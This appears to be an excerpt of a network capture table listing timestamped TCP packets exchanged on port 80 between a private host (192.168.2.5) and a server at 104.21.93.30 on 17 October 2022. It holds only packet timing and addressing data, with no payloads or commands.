                                                                                                                                  Oct 17, 2022 22:06:37.435281038 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:37.435390949 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:37.435396910 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:37.435416937 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:37.435446024 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:37.435447931 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:37.435465097 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:37.435482025 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:37.435497999 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:37.435498953 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:37.435511112 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:37.435563087 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:37.435581923 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:37.435599089 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:37.435614109 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:37.435616970 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:37.435631037 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:37.435633898 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:37.435647964 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:37.435662985 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:37.435678005 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:37.435682058 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:37.435693979 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:37.435698986 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:37.435710907 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:37.435726881 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:37.435743093 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:37.435745955 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:37.435758114 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:37.435767889 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:37.435774088 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:37.435791016 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:37.435795069 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:37.435806990 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:37.435822964 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:37.435836077 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:37.435838938 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:37.435854912 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:37.435863972 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:37.435870886 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:37.435888052 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:37.435897112 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:37.435902119 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:37.435918093 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:37.435929060 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:37.435934067 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:37.435972929 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:37.435977936 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:37.436017036 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:37.436033964 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:37.436049938 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:37.436057091 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:37.436064005 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:37.436075926 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:37.436115980 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:37.436173916 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:37.436291933 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:37.436311960 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:37.436328888 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:37.436345100 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:37.436362028 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:37.436378002 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:37.436378002 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:37.436391115 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:37.436394930 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:37.436410904 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:37.436418056 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:37.436427116 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:37.436441898 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:37.436456919 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:37.436484098 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:37.436570883 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:37.436589956 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:37.436605930 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:37.436623096 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:37.436633110 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:37.436638117 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:37.436655045 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:37.436671019 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:37.436671972 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:37.436695099 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:37.436702013 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:37.436713934 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:37.436728954 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:37.436741114 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:37.436745882 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:37.436762094 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:37.436774969 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:37.436779022 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:37.436794996 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:37.436804056 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:37.436810970 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:37.436826944 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:37.436841011 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:37.436844110 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:37.436860085 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:37.436872959 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:37.436886072 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:37.436918974 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:37.436990976 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:37.438127995 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:37.438153028 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:37.438170910 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:37.438188076 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:37.438205004 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:37.438215971 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:37.438221931 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:37.438239098 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:37.438290119 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:37.438317060 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:37.479847908 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:37.479876995 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:37.479896069 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:37.479912996 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:37.479926109 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:37.479983091 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:37.480101109 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.070897102 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.070976973 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.103126049 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.103159904 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.175702095 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.175753117 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.175942898 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.261997938 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.262077093 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.294239044 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.294279099 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.378248930 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.378299952 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.378326893 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.378351927 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.378379107 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.378406048 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.378432035 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.378458023 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.378479958 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.378504992 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.378509045 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.378528118 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.378552914 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.378576040 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.378577948 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.378603935 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.378609896 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.378628969 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.378653049 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.378659010 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.378678083 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.378703117 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.378714085 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.378729105 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.378750086 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.378755093 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.378779888 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.378792048 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.378806114 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.378832102 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.378849030 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.378856897 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.378897905 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.378901005 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.378923893 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.378948927 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.378963947 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.379615068 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.379671097 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.379703999 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.379734039 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.379744053 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.379765034 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.379793882 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.379801989 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.379826069 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.379827976 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.379856110 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.379864931 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.379884958 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.379914999 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.379929066 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.379939079 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.379976988 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.382276058 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.382323980 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.382350922 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.382375002 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.382400990 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.382411957 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.382428885 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.382455111 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.382477045 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.382477999 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.382504940 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.382514000 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.382524967 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.382536888 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.382572889 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.423527002 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.423568010 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.423588037 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.423607111 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.423624039 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.423640013 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.423656940 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.423672915 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.423690081 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.423706055 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.423712015 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.423738003 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.423751116 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.423763990 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.423775911 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.423789024 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.423794985 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.423805952 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.423818111 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.423835039 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.423839092 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.423851013 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.423863888 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.423868895 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.423885107 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.423887968 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.423902988 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.423907042 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.423918962 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.423937082 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.423944950 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.423953056 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.423968077 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.423979998 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.423984051 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.424000978 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.424005032 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.424017906 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.424032927 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.424035072 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.424052000 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.424069881 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.424091101 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.424120903 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.424144030 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.424165964 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.424181938 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.424197912 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.424205065 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.424215078 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.424231052 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.424241066 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.424247026 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.424263000 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.424263954 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.424278975 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.424294949 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.424312115 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.424314022 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.424330950 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.424346924 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.424354076 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.424365997 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.424386024 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.424392939 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.424402952 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.424410105 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.424421072 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.424438953 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.424442053 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.424455881 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.424477100 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.424894094 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.424915075 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.424932003 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.424949884 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.424971104 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.424988031 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.424995899 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.425004959 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.425021887 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.425040007 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.425050974 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.425057888 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.425075054 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.425076008 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.425091982 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.425108910 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.425126076 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.425131083 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.425143003 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.425160885 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.425163031 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.425177097 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.425192118 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.425194979 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.425211906 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.425216913 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.425229073 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.425245047 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.425251007 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.425261974 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.425277948 CEST8049692104.21.93.30192.168.2.5
